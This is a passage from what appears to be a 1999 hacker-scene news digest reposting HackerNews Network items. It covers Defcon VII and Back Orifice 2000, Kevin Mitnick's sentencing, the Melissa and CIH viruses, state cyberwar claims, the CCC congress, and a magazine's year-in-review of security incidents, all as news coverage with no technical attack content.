Again for some reason, this angle for the show was not to MTV's liking so they struck out on their own looking for whatever it was they wanted. They found Shamrock, the host of the Internet TV show devoted to hacking known as Pseudo. The result was a complete farce. Evidently Shamrock decided to take MTV for a ride and give them what they wanted, a story line straight out of the movie Hackers. The show did nothing to explain what hacking was all about and was far from a documentary. Needless to say many people are upset at MTV and others over this mess.

Letters from HNN Viewers
http://www.hackernews.com/special/1999/mtv/mtv.html
Letter from Emmanuel Goldstein
http://www.hackernews.com/special/1999/mtv/emmanuel.html
Letter from Shamrock
http://www.hackernews.com/special/1999/mtv/shamrock.html

Defcon VII and BO2K

Defcon probably had the most mainstream media coverage of any hacker convention to date. With over 3000 attendees and over 200 press representatives present it was definitely one of the biggest conventions ever. With the release of Back Orifice 2000 from the Cult of the Dead Cow the press was working at a fever pitch trying to cover the story even before the software was released.

HNN spent quite a few days inebriated in Las Vegas while we tried to cover the happenings at Defcon.
Some of the highlights included the BO2K launch presentation, complete with thumping techno and strobe lights, the ejection of Carolyn Meinel from the conference floor, and the defacement of the Defcon.org web page. When we returned we had over 1200 emails to answer and one pounding hangover. The media went nuts over the BO2K release, sparking debates on just what a virus is and what should be scanned. Network Associates claimed to be the first out of the gate with a patch for the program. Microsoft was even prompted to release a security bulletin. Also at Defcon, Zero Knowledge released 1000 beta copies of Freedom, L0pht Heavy Industries introduced the revolutionary new security tool AntiSniff, Bruce Schneier announced that PPTPv2 'sucks less', and Security Wizards released their Capture the Flag Logs.

HNN Archive for July 9, 1999 - Press frenzy prior to con
http://www.hackernews.com/arch.html?070999

Defcon.org Defacement Mirror
http://www.hackernews.com/defaced/1999/defcon/index.html

HNN Archive for July 13, 1999 - the Aftermath
http://www.hackernews.com/arch.html?071399

Defcon VII Review - Buffer Overflow Article
http://www.hackernews.com/bufferoverflow/99/defconVII.html

The Back Orifice 2000 Controversy - Buffer Overflow Article
http://www.hackernews.com/bufferoverflow/99/bo2k-1.html

How the Anti Virus Industry Works - Buffer Overflow Article
http://www.hackernews.com/bufferoverflow/99/avindustry.html

AntiVirus scanning for potentially misused tools is a doomed security strategy. - Buffer Overflow Article
http://www.hackernews.com/bufferoverflow/99/avscanning.html

Kevin Mitnick

Kevin Mitnick's road has been a long and bumpy one that has stretched for several years; 1999 was no different. One small bright thing is that Kevin is scheduled to be released, finally, sometime early in 2000. In March the federal government succeeded in wearing Kevin down. He decided to plead guilty in the hopes of getting his four year ordeal over with.
Unfortunately he still had charges from the State of California to deal with.

HNN Archive for March 29, 1999
http://www.hackernews.com/arch.html?032999#2

On April 26th it was revealed that the companies supposedly hurt by theft of software by Kevin Mitnick never reported those millions of dollars in losses to the SEC as required by law.

HNN Archive for April 25, 1999
http://www.hackernews.com/arch.html?042599

Letters from companies estimating the amount of damages.
http://www.hackernews.com/special/1999/letters.html

June 4th was supposed to be the day in which Kevin was officially sentenced and so demonstrations to support Kevin were planned at federal courthouses across the country. Unfortunately the hearing was postponed at the last minute but the demonstrations continued. Folks in other countries joined in by protesting outside embassies; the New York demonstration hired a skywriter to write FREE KEVIN over Central Park; the Philadelphia demonstration made it onto the local news and many online news agencies covered the San Francisco demonstration; numerous other cities attempted to live web cast their demonstrations.

HNN Archive for June 5, 1999
http://www.hackernews.com/arch.html?060599

Press Release - Demonstration Announcement
http://www.hackernews.com/press/mitnickpr.html

Picture of the Russian Demonstration
http://www.hackernews.com/images/kewl4.html

On Kevin's fifth birthday behind bars the LA District Attorney graciously decided to drop the state charges against him. The DA claimed that the case had been mischarged. Finally on August 9th, after numerous delays, Kevin received his sentence of 46 months in prison with credit for time served. He will also be forced to pay $4125 restitution to the supposed victims in the case. Instead of a halfway house as expected, he was remanded to Lompoc Federal Prison.
HNN Archive for August 9, 1999
http://www.hackernews.com/arch.html?080999

Much more in depth information regarding Kevin Mitnick, his current status and the historical significance of this case can be found here.

FREE KEVIN
http://www.freekevin.com

Virus Scares

1999 was a banner year for viruses. Melissa, CIH, and numerous other viruses had the press working overtime. The virus writers keep churning them out, the antivirus companies keep detecting them and the press was not far behind. Melissa seemed to be extremely virulent. By emailing 50 copies of itself after every infection it made it around the globe very quickly. It managed to jump the air-gap onto the US government's SIPRNet and even made it on board ships in the Seventh Fleet. Numerous variants of Melissa surfaced with distributed DoS attack capability. Melissa was somehow traced through Usenet to AOL and finally to David L. Smith who pleaded guilty to creating and releasing the virus.

HNN Archive for March 31, 1999 - Melissa makes it to 7th Fleet, Kills Marines Email, DoS Variant Appears
http://www.hackernews.com/arch.html?033199#2

HNN Archive for April 2, 1999 - David Smith arrested and released on $100,000 bail
http://www.hackernews.com/arch.html?040299

HNN Archive for April 5, 1999 - Melissa jumps air-gap onto classified SIPRNet
http://www.hackernews.com/arch.html?040599

HNN Archive for December 12, 1999 - David Smith pleads guilty.
http://www.hackernews.com/arch.html?121299

CIH, while not as prolific as Melissa, was definitely more destructive. CIH or Chernobyl is triggered to release its payload on April 26th every year and it has been around for a while. It hit exceedingly hard this year especially in the Far East. Its creator was traced back to Taiwan where he said he was sorry.

HNN Archive for April 27, 1999 - CIH strikes worldwide
http://www.hackernews.com/arch.html?042799

HNN Archive for April 29, 1999 - CIH Author Identified.
http://www.hackernews.com/arch.html?042999

HNN Archive for May 12, 1999 - China Estimates 360,000 systems Damaged by CIH
http://www.hackernews.com/arch.html?051299#3

The Virus Community Speaks
http://www.hackernews.com/special/1999/virus.html

How the Anti Virus Industry Works - Buffer Overflow Article
http://www.hackernews.com/bufferoverflow/99/avindustry.html

AntiVirus scanning for potentially misused tools is a doomed security strategy. - Buffer Overflow Article
http://www.hackernews.com/bufferoverflow/99/avscanning.html

Ireland, Indonesia, China, Sweden, and Yugoslavia

Government sanctioned cyber attacks seem to be all the rage these days. Some countries are openly announcing their plans to create offensive cyber warriors while others are claiming to have already suffered government sanctioned cyber attacks. In January a small ISP in Ireland, Connect Ireland, that hosts the top level domain for East Timor claimed that it had suffered a massive attack by Indonesian government forces. Indonesia of course denied the charges.

HNN Archive for January 26, 1999
http://www.hackernews.com/arch.html?012699

Newsweek claimed that President Clinton authorized a "top-secret" plan against Slobodan Milosevic. One part of this plan would use "computer hackers" to attack his foreign bank accounts. Newsweek went on to say that the report instructed the CIA to wage "cyberwar" against Milosevic.

HNN Archive for May 24, 1999
http://www.hackernews.com/arch.html?052499

HNN Archive for July 6, 1999
http://www.hackernews.com/arch.html?070699

Yugoslavia Cut Off from the Net? - Buffer Overflow Article
http://www.hackernews.com/bufferoverflow/99/yugo.html

Sweden announced the formation of a cyber defense force.
HNN Archive for July 14, 1999
http://www.hackernews.com/arch.html?071499#3

Nobel Peace Prize laureate Jose Ramos-Horta claimed that hundreds of people around the world were poised to launch a cyber attack against Indonesia should there be any tampering in the election process for East Timor's freedom. No evidence was given for this cyber arsenal build up and no attack ever came. Connect Ireland, the ISP supposedly targeted by Indonesian forces earlier in the year, asked that no internet attacks be launched.

HNN Archive for August 20, 1999
http://www.hackernews.com/arch.html?082099

Connect Ireland - response to Indonesian threats
http://www.hackernews.com/press/conire.html

A Chinese military newspaper covering the activities of China's People's Liberation Army has called for the recruitment of 'civilian hackers' and for the training of 'cyber warriors' at Army schools.

HNN Archive for August 4, 1999
http://www.hackernews.com/arch.html?080499#4

We hope that this disturbing trend does not continue into the next year. It will be an extremely bad day when the internet is legislated as a weapon of war.

@HWA

11.0 16th CCC Congress opens Monday in Berlin 12/26/99
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Frank

Although the Y2K issue will keep many people from attending this year, the 16th annual Chaos Computer Congress is expecting over 2000 people to show up. New to this year's conference will be Lego Mindstorms Sumo where competitors attempt to push each other's creations off a table.

Chaos Communication Congress
http://www.ccc.de/congress/

HNN Cons Page
http://www.hackernews.com/cons/cons.html

Wired
http://www.wired.com/news/culture/0,1284,33263,00.html

Chaos Reigns in Berlin
by Steve Kettmann
3:00 a.m. 24.Dec.1999 PST

BERLIN -- Any time the inimitable Berlin hackers of the Chaos Computer Club convene, count on cutting-edge insights to emerge from the proceedings.
That should be true at the 16th annual CCC congress opening Monday in Berlin, even though the vitality of the three-day event could be short-circuited by the surge of Y2K angst. After all, just the sort of gifted, seasoned hackers and computer visionaries the CCC attracts will in many cases be chained to their desks, stuck on the Y2K watch. "A lot of people are not allowed to go anywhere in these days," CCC spokesman Andy Mueller-Maguhn said. "They all have to stay at their companies until the end of January to see if there are any problems with Y2K. So this is a more chaotic congress than ever." Still, the show promises not to be dull. More than 2,000 people from around the world are expected to talk hacking, do actual hacking, and just generally wallow in the face-to-face contact computer-obsessed people sometimes miss. The annual congresses have featured such lively fare as a spirited debate last year on the controversial death of famous German hacker Boris Floricic, known as Tron (many of his friends still think his apparent suicide in October 1998 was faked by police). Tron's computer and all his files were confiscated, and a discussion this year will be dedicated to him. Last summer, the CCC organized a sprawling hacker camp outside of Berlin. One of the highlights then was Electronic Frontier Foundation board member John Gilmore leading discussions on topics such as encryption code and the ins and outs of Linux -- all the while taking breaks for space waffles and other diversions. Lock-picking, a sort of mechanical-world spinoff of hacking, was also a huge hit at that camp, and it's expected to pick up next week. Also popular at the summer camp was the Art & Beauty Raum: "For people interested in creating and designing and using computers to build your own world."
Other projects will be Create a Part of c-base Contest, Computer Generated Comics, Poetech Slam, and, maybe the most provocatively titled of all, Lego Mindstorms Sumo. "Groups of people will build their stuff in three days and fight with each other and try to throw each other from the table," Mueller-Maguhn said. The CCC has been known internationally for years, and it played a major role this year in helping Andrew Fernandes tell the world about his belief that the National Security Agency might have worked with Microsoft to make it easier for the government agency to bypass security systems in the major Windows operating systems. Fernandes, chief scientist for the security software company Cryptonym in Mississauga, Ontario, chose the CCC to help make his announcement because tapping them is the way to tap the worldwide hacker scene, he said at the time.

@HWA

12.0 Canadian Youth Held for Cyber Ransom 12/26/99
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

A 14-year-old Toronto youngster has been charged with electronically breaking into an unidentified e-commerce company. The youth allegedly broke into the company's site and changed passwords to prevent the owner from accessing his mail. He then demanded $5,000 from the owner to return control and was arrested when he came to collect his cash.

CNews
http://www.canoe.ca/TechNews9912/23_hacker.html

Thursday, December 23, 1999

Hacker, 14, in jail over ransom scheme
By IAN HARVEY, TORONTO SUN

A 14-year-old hacker who held a Toronto e-commerce company for ransom will spend Christmas in jail. He was held over in custody to Jan. 4 at his bail hearing yesterday on request of his lawyer. Meanwhile, Toronto police are scanning his hard drive, seized from his computer, to see just what else the juvenile hacker has been up to. "We have no idea how far this goes or if this is the only company that has been victimized," said Det.
Myron Demkiw of the west-end 14 division. He was guarded about the youth's technique and background because the accused is a young offender. However, Jim Carroll, co-author of the Canadian Internet Handbook, says the youth probably isn't a computer genius. "Most of the time hackers can do what they do because of negligence on the part of the network administrators," he said. The York region youth was charged with hacking to the company's site and changing passwords to prevent the owner from accessing his mail. He then demanded $5,000 from the owner to return control and was arrested when he came to collect his cash. The network hacker is one of three types, which also include the virus builder and software cracker (someone who "cracks" the anti-piracy protection on software to allow it to be copied and bootlegged). While the youth certainly has some knowledge of the Internet and computer language, he's probably not the stereotypical hacker, said McMaster University professor David Jones of the Electronic Frontier Canada. He said there's a whole community of like-minded computer fans who share information on weaknesses in security systems and passwords online. "It's like kids playing Nintendo 64; it's a whole different world," he said. "They know all the cheat codes to get to other levels and characters. How? They just know." Both Jones and Carroll said any system that allowed a 14-year-old to breach security was "pretty crappy." "For the kids who do it, it's like a game; they gain face by getting into system," Jones said.

@HWA

13.0 Poulsen's List of Gifts to Get a Hacker 12/26/99
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ya its a little late, maybe next year? heh - Ed

From HNN http://www.hackernews.com/

contributed by Evil Wench

Kevin Poulsen has published a Christmas shopping list for the hacker. Kevin could have shown some more creativity, not to mention a longer list.
While the items he has chosen are ok, my wish list is quite a bit longer and a lot more expensive. Everyone knows Hackers want LOTS of goodies for the holidays. (LEDs = Power Whoever has the most when they die, wins.

ZD Net
http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2412532,00.html

A Hacker Christmas
Last-minute gift purchases for the hacker in the house.
By Kevin Poulsen
December 22, 1999

With each passing holiday season, it seems I'm asked more and more frequently, "Kevin, what do I get a hacker for the holidays?" Here are a few answers. The Happy Hacker keyboard from PFU America dispenses with such frivolities as a caps-lock key, numeric keypad, or function keys, and finally puts the control key back where it belongs-- next to the left pinky finger. Don't even ask where the Windows key is. The design is openly hostile to everything Microsoft, making it particularly popular with the Linux set. The keyboard is meant for coding, though its super-compact 11.6 x 4.3 inch footprint makes it attractive to anyone tired of stretching to reach the mouse. Regrettably, it comes only in white, but optional carrying cases in burgundy, navy, and black make it a fashionable tote for contemporary cyberpunks.

Too Hip?

Looking for stocking stuffers? I recommend The Matrix on DVD. The film itself is a hacker-culture masterpiece. More importantly, the DVD format recently earned a certain cachet when hackers took the trouble to reverse engineer the copy protection scheme so they could watch movies on their Linux boxes. The Matrix title has the added coolness that comes with being so advanced that it doesn't work on some older models of consumer DVD players. It's not a bug, it's a feature!

For the Kid in All of Us

Toys of any kind are a popular Christmas treat, and there are certain kinds of playthings that have a fundamental appeal to hackers of all ages.
A passion for LEGO's interlocking building blocks, popular in the 1960s, has been a dirty little secret shared by many hackers for generations. It got a shot in the arm recently, when LEGO created Mindstorms, a fully motorized, programmable robotic block system, with infrared communications and embedded light sensors, among other features. Mindstorms was meant for kids: it comes with friendly software that lets little tykes program their robotic creations with point-and-click ease. Hackers, however, are doing, well, what hackers do: writing an open source operating system for the brainy blocks which includes dynamic module loading and a memory management system. The legOS programmers (no, I'm not making this up) recently fixed a bug in their inter-block packet switching code, just in time for Christmas.

Gifting in Style

Finally, this holiday season, say it with wearable computing. Xybernaut offers a lightweight, 233-MHZ system that clips to any utility belt or an optional vest. A headset serves as a user interface, allowing the lucky recipient of your Yuletide generosity to issue voice commands through a microphone while viewing output on a one-inch diagonal monitor that hangs in front of the wearer's left eye. Add a wireless modem, and the hacker in your life need never log off the Net.

@HWA

14.0 More FUD About Cyberterrorists and Y2K 12/26/99
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Gh0st47

As we get closer and closer to that magical day, January 1st, the media will continue to increase the FUD factor regarding Y2K. Since the initial problem of computer meltdown seems to be fading away the issue of viruses and terrorist attacks is getting more attention. While the threats are definitely real it is doubtful they are as fantastic as most would have us believe.
Access Atlanta
http://www.accessatlanta.com/partners/ajc/epaper/editions/today/news_23.html

NATION IN BRIEF
Monday • January 10

Slain soldier's parents ponder suing Army

The parents of slain Pfc. Barry Winchell are considering suing the Army for failing to protect their son from anti-gay harassment. In an interview Sunday, Pat and Wally Kutteles said military officials at Fort Campbell, Ky., did not take sufficient precautions to prevent Winchell's July 5 beating. Winchell, who was rumored to be gay, was attacked by another soldier as he was sleeping. Pat Kutteles said commanders at the 101st Airborne Division tolerated a four-month harassment campaign against her son in clear violation of the Pentagon's ''don't ask, don't tell'' policy toward gays, a standard that has come under mounting criticism in recent weeks. The Kansas City, Mo. couple's comments came a day after Army Spc. Justin R. Fisher, 26, pleaded guilty to obstructing justice and lying to military investigators in connection with Winchell's death. Fisher, who was sentenced to 12 1/2 years in prison, wiped blood off the bat that Pvt. Calvin N. Glover used to kill Winchell. Prosecutors had said Fisher, who was Winchell's barracks mate, encouraged Glover to attack Winchell. Glover, 18, was convicted last month of premeditated murder and sentenced to life in prison with the possibility of parole.

FBI watched mayor for 40 years, paper says

The late Detroit Mayor Coleman Young was under FBI surveillance for roughly four decades, The Detroit News reported Sunday. Records obtained under the federal Freedom of Information Act show the surveillance began in the 1940s when agents who suspected the well-known labor activist had Communist ties followed him to union meetings, the newspaper said. Young was mayor for 20 years, retiring in 1994. He died in 1997.
Elderly avoid crime by staying at home

Violent criminals attack Americans age 65 or older far less often than younger men and women, probably because older people do not go out at night as much, the Justice Department reported Sunday. There were an average of 5.3 violent crimes for every 1,000 U.S. residents age 65 or older each year from 1992 through 1997, the department's Bureau of Justice Statistics said. About 22 percent of elderly violence victims reported they never went out at night for entertainment, shopping or other activities.

Controversial exhibit ends run in New York

Art lovers and the morbidly curious flocked to New York City's Brooklyn Museum in large numbers on Sunday for a last look at the controversial ''Sensation'' art exhibit with its dung-decorated Madonna. As the crowd swelled on the final day of the exhibit's three-month run, about two dozen demonstrators stood outside, singing hymns and reciting ''Hail Mary,'' a Catholic prayer, in protest of what they claim is a blasphemous painting of the Virgin Mary. Chris Ofili's painting, ''The Holy Virgin Mary,'' features the Virgin Mary decorated with elephant dung.

@HWA

15.0 The Datacore Encryption Suite 1.0 Released on Christmas 12/26/99
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by The Hex

The Datacore releases The Datacore Encryption Suite 1.0 on December 25. DES1.0 consists of an easy to use interface, and uses many well-known algorithms. They hope you enjoy the program.

The Datacore
http://www.tdcore.com/newbuild/fractal/preview.html (197k download)

@HWA

16.0 One Third of UK Vulnerable to Online Attack 12/27/99
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

A survey of 150 UK-based IT managers and directors who use the Internet as a business tool found that one third of them did not have adequate measures in place to prevent a cyber attack.
The study, conducted by Novell, found that 37% of UK companies on the net have no firewall and 44% do not make use of authentication.

Info-Sec.com
http://www.info-sec.com/internet/99/internet_122799b_j.shtml

@HWA

17.0 Grades Changed at NY School 12/27/99
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by pyrodude2001

According to school officials at Spencerport High School a student may have accessed the grading system of the school's computer and changed a few of them. Officials are unsure of how the intrusion occurred or if in fact any grades were changed. As a precaution teachers will manually verify the grades in the computer with their records.

Rochester News
http://www.rochesternews.com/1225grades.html (Sorry, link gave us a 404 - Ed)

@HWA

18.0 Cops Wanted, Hackers Need Not Apply 12/27/99
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

What do Deloitte & Touche, Ernst & Young and PricewaterhouseCoopers all seem to have in common? According to this article it is that all of them are looking for ex-law enforcement personnel to work in their computer forensic divisions. No, they don't want people who have been dealing with computer security since they were three, they want someone with a background in dealing with rapists and hit men.

NY Times - Yes registration is required. Just use a fake address.
http://www.nytimes.com/library/financial/personal/122699personal-cybercrime.html

December 26, 1999

CALLINGS
The Hunt for Cybercrime
By LAURA PEDERSEN-PIETERSEN

Tracking down embezzlers, computer hackers, money launderers, shady stock promoters and other white-collar criminals may lack the pizazz of James Bond outwitting Goldfinger or decapitating Oddjob.
But in a post-cold-war global economy, don't be surprised if some of the first movie heroes of the new millennium are bespectacled, Palm VII-packing auditors from Big Five accounting firms, Web browsers at the ready. "The breadth of criminal activities facilitated by global computer networks, such as lifting personal credit card information, redirecting electronic funds and stealing proprietary and other confidential information, continues to grow," said Stephen O. Pierce, a partner at PricewaterhouseCoopers who heads its investigations unit. And crimes could hit close to home. One of the firm's clients, the Pension Benefit Guaranty Corporation, a federal agency that sends checks to some 500,000 retirees, recently found its computer defenses penetrated by security experts who could have robbed it blind. The reason they didn't was that the break-in was a test of the agency's systems, determining that for all the electronic safeguards, it was vulnerable to external and internal attack. With businesses rushing to go online, theft and fraud are not far behind. E-commerce has spawned its own array of hard-to-detect cybercrimes, like transaction fraud and Web site destruction. The crimes are producing not only fear in corporations, but also many new assignments for auditors and consultants, who are increasingly being asked to trace e-mail and ferret out smoldering diskettes. But in trying to find gumshoes who can sniff out white-collar crime from three cubicles away, Big Five recruiters obviously won't find many candidates on the B-school campus. That is why, over the last 18 months, almost all of the 25 new employees hired for the Deloitte & Touche forensic and investigative services division came with law-enforcement experience. And PricewaterhouseCoopers, in addition to hiring former F.B.I. and Interpol agents, has just recruited Scott Charney, 43, formerly a top cybercop at the Justice Department. 
At Ernst & Young, the forensic investigations practice has more than tripled in two years, said Cheryl Sparkes, a partner. "We've gone from 30 to 100 employees and we're aggressively seeking more," she said, "mostly with law enforcement and other investigative backgrounds." CONSIDER Don M. Svendson, 50, hired last year after a 26-year career with the Royal Canadian Mounted Police to run Deloitte & Touche's investigative office in Chicago. "There's no end in sight to the rise in embezzlement, executive malfeasance and money laundering," he said. Though a roaring economy and the dot-com invasion make pastures greener for criminal activity, Mr. Svendson says there is more to it than that. "Corporations are leaner and meaner, the management turnover is high and companies can't exercise all the controls they really need," he said. Mr. Svendson may well be a typical recruit -- someone with professional training in criminal justice and decades of hands-on experience. While the job may not sound as adrenaline-pumping as his previous work -- which included commanding a SWAT team in Manitoba and breaking up riots -- he says he finds it thrilling. Having extracted confessions from rapists and hit men, Mr. Svendson was recently asked to put his interrogation skills to work on someone suspected of embezzlement at a company after irregularities were found. Mr. Svendson said he got the employee to confess; the employee was dismissed. "You need to know what body language to look for and how to ask the questions," Mr. Svendson said. Ed Rial, 40, recently made the leap from criminal justice to corporate fraud investigation, and is now a Deloitte partner. Mr. Rial, who dreamed as a boy of being a detective, graduated from the University of Pennsylvania law school in 1984 and took a job at the Justice Department in Manhattan.
He spent almost a decade as a federal prosecutor and four years in charge of a New York office of the department's business and securities fraud unit, bringing to trial cases involving drugs, murder and kidnapping. With Deloitte since November, Mr. Rial specializes in hunting down corporate fraud, kickback schemes and insurance fraud. These days, he sees stock fraud as the fastest-growing white-collar crime. In particular, he cites outfits that take shell companies public, trade with cronies, then dump the shares into the public's lap through cold calls. "Many of these boiler-room brokers worked for years as telemarketers," Mr. Rial said. "They have phenomenal sales skills and are completely unscrupulous. And it's incredible the amount of participation they get from smart people -- doctors, lawyers and educators." The quick stock-market success of Internet companies, he added, makes people more susceptible to high-technology pitches from fraudulent promoters. And many people don't think of white-collar crime as a big issue anyhow. "It's because the perpetrators are often the people you grew up with, the best friend of your father," Mr. Rial said. "They're almost always people in very senior positions. Believe me, no one ever says, 'I always suspected him.' "

@HWA

19.0 IDS Signature Database Open to the Public 12/27/99
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by vision

arachNIDS (Advanced Reference Archive of Current Heuristics for Network Intrusion Detection Systems) is now open to the public. The database is an attempt to profile probes, exploits, and other network-borne attacks by way of packet details, example sniffer traces of the attack, and a signature that can be exported for use in free IDS products such as Snort. This preliminary release will be greatly expanded upon as time goes by.
Whitehats.com
http://whitehats.com/

@HWA

20.0 InfoSecurity 1999 Year in Review 12/27/99
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

InfoSecurity Magazine has published its 1999 Year in Review. Their list contrasts greatly with the top stories of 1999 as picked by HNN.

Info Security Magazine
http://www.infosecuritymag.com/dec99/1299Yr.inRev.htm

HNN's 1999 Year in Review
http://www.hackernews.com/special/1999/99topstories.html (See elsewhere in this issue)

Info Security Mag:

1999 Infosecurity Year-in-Review

From Melissa to Explore.Zip, from Hotmail to TWINKLE, from BubbleBoy to BO2K, from InfraGard to Fidnet, the events of 1999 put information security in the public eye and on the corporate roadmap like never before. As we look back on the year that was, it's clear just how important infosec has become to the stability and prosperity of commerce, communication and international peace.

BY M.E. KABAY

This article is excerpted from ICSA Labs's Infosec Year-in-Review database, which classifies hundreds of cases and issues spanning the field of information security. The complete report will be available for download as a PDF file in early 2000. www.icsa.net

1999 was a remarkable year in the field of information systems security. Ten years from now, the last year of the second millennium will be remembered for a number of important events:

• In the fight against malicious code, 1999 was the year the AV experts' direst predictions came true: e-mail-enabled viruses and worms are now a serious threat to systems everywhere. Because these new forms of malicious software can spread so fast through the 'Net, waiting for antivirus vendors to produce updates to signature tables is not enough to protect everyone. In 2000, the AV industry will need to develop better heuristic techniques to identify the abnormal behavior of such viruses/worms, stopping them even if they aren't immediately identified by their signatures.

• In addition to losing its landmark antitrust case with the Justice Department, Microsoft was again the target of widespread criticism in 1999 for its "security" practices, including its absurd policy of turning every consumer product it makes into a programming language (or the equivalent of an operating system). The security community’s message to the Redmond software giant is now louder than ever: Stop this nonsense of allowing automatic execution of macros when opening Word and Excel files. And it would be helpful if Windows had provisions for enabling pop-up warnings that could be configured—preferably by default—to warn naive users about the risks of opening executables of unknown origin. Will Microsoft listen? Only time will tell. Meanwhile, the public release of Win2K is only eight weeks away.

• The number of successful attacks on Web sites increased dramatically in 1999. More and more script kiddies are plastering graffiti on government, industry and educational Web sites as if they were engaged in a video game. Systems administrators continue to be deprived of adequate resources and management support to keep Internet-visible networks patched so that vulnerabilities are fixed before someone can exploit them.

• In addition to the script kiddie wars, 1999 witnessed several cases of Web defacement that seemed to be a form of information warfare. Chinese and Taiwanese hackers attacked government sites on both sides of the water, and Serbian and Kosovar hackers did the same to each other’s governmental sites.

• Privacy has developed as perhaps the single greatest concern of the ordinary Internet-using public in 1999. There have been many legislative initiatives to improve privacy in the United States and elsewhere; the new EU Data Privacy Directive has serious implications for all organizations intending to do business with Europe.

• Ah, yes, and then there’s Y2K.
I deliberately omitted mention of the Y2K problem in the following article, since most would argue it’s not really a "security" issue to begin with. Suffice it to say, the Y2K transition may be the best opportunity we’ll ever have to witness the equivalent of information warfare on our highly technological society. I hope there won’t be any trouble, but if there is, we should observe carefully and learn quickly from our mistakes.

Now, here’s a review of some of the year’s other major events, broken out within nearly two-dozen categories.

Breaches of Confidentiality

4.22.99 Joe Harris, a computer technician at the Seattle-area "Blarg! Online" ISP, discovered that improperly installed shopping-cart software, used widely on the ’Net to simplify shopping, can allow anyone to see confidential data, such as credit card numbers. Security analysts pointed out that the plain ASCII file where such data are stored should not be on the Web server at all—or if it is, the file should be encrypted. Initial evaluation suggested that the weakness affects at least several hundred, and possibly many thousands, of e-commerce sites where the software was improperly installed.

Wiretapping, Interception (Not Jamming)

4.27.99 The Australian Security Intelligence Organization (ASIO) announced its intention to seek remote access to computer records of suspects under investigation. However, a spokesman for the ASIO said the organization had not yet broken into computers using existing technology, since that was not permitted under current law.

Data Diddling, Data Corruption

3.01.99 We learned in March that two more Chinese criminal hackers were sentenced to death in China in December 1998. The twin brothers stole 720,000 Yuan (~US$87,000) from a bank in Zhenjiang and transferred the money to their own accounts.

Viruses, Hoaxes, Trojans

3.27.99 On Friday, March 26, CERT/CC received initial reports of a fast-spreading new MS-Word macro virus called Melissa.
Once loaded, it used the victim’s MAPI-standard e-mail address book to send copies of itself to the first 50 people on the list. The virus attached an infected document to an e-mail message bearing the subject line, "Important Message From <name>," where <name> was that of the inadvertent sender. The e-mail message read, "Here is that document you asked for … don’t show anyone else ;-)" and included an infected MS-Word file as an attachment. The original infected document, "list.doc," was a compilation of URLs for pornographic Web sites.

3.30.99 Hot on the heels of the Melissa outbreak, a similar virus attacking MS-Excel spreadsheets appeared on the ’Net at the end of March. The so-called PaPa macro virus was more virulent than Melissa in that it sent out copies of itself to 60 names drawn from the victim’s e-mail address book, and did so every time an infected document was opened.

4.26.99 According to newswire reports, the Chernobyl computer virus struck hundreds of thousands of computers in Asia and the Middle East, with Turkey and South Korea each reporting 300,000 damaged computers.

5.28.99 Network Associates’s antivirus labs warned of a new Trojan called BackDoor-G, which was being sent around the ’Net as spam.

6.11.99 The Explore.Zip worm appeared as an attachment to e-mail masquerading as an innocuous compressed WinZip file. The executable file used the icon from WinZip to fool people into double-clicking it, at which time it began destroying files on disk.

9.02.99 Symantec announced the discovery of a dangerous MS-Word 97 macro virus called Thursday, which had a trigger date of Dec. 13. This virus was seen in the wild on about 5,000 computers in Austria, France, Germany, Ireland, Latvia, Poland, Switzerland, the U.K. and the U.S. The payload could erase all files on the victim’s C: drive.

9.20.99 A couple of new Y2K-related virus/worms were discovered in September. One e-mail Trojan, called Y2Kcount.exe, claimed that its attachment was a Y2K-countdown clock; actually, it sent user IDs and passwords out into the ’Net by e-mail. Microsoft reported finding eight different versions of the e-mail in circulation. The other Y2K virus, named W32/Fix2001, came as an attachment (ostensibly from the systems administrator) and urged victims to install the "fix" to prevent Internet problems related to the Y2K transition. Actually, the virus/worm would replicate through attachments to all outbound e-mail messages from the infected system.

11.08.99 In early November, a worrisome new worm called BubbleBoy appeared on the scene. This proof-of-concept worm was sent to Network Associates, which immediately posted a free software patch and alerted the FBI of the danger. The problem with this worm was that it would infect a host if an MS-Outlook user merely highlighted the subject line of the carrier e-mail message—no double-clicking was required. The worm’s payload was mild—changes to the registry and a simple display screen—but experts warned that the same techniques could carry much more dangerous payloads in future variations. The worm spread by mailing itself to every e-mail address on the infected system’s address list, thus posing an even greater potential danger than the Melissa virus. This attack again demonstrates the foolishness of allowing automatic execution of code by e-mail and word-processing packages.

Industrial Espionage, Infowar

1.04.99 An article in January reported on the RAND Corporation’s DoD-commissioned report, "Strategic Information Warfare Rising," issued in mid-1998. The report fueled the growing debate within the Pentagon about the wisdom of pursuing offensive information warfare capabilities. Opponents argued that widening the sphere of warfare to include cyberattacks on critical infrastructure would only increase the likelihood of successful attacks on the United States.
The report laid out four basic scenarios for future developments in infowar (IW). Daniel Verton, writing in Federal Computer Week, summarized these scenarios as follows:

• U.S. supremacy in offense and defensive strategic IW.
• A club of strategic IW elites, whereby a policy of no first use of strategic IW capabilities could be established.
• Global "defensive dominance" in strategic IW, whereby a regime would be established to control the spread of strategic IW similar to biological and chemical weapons.
• Market-based diversity, whereby the damage or disruption achievable through a strategic IW attack is modest and recovery is fast.

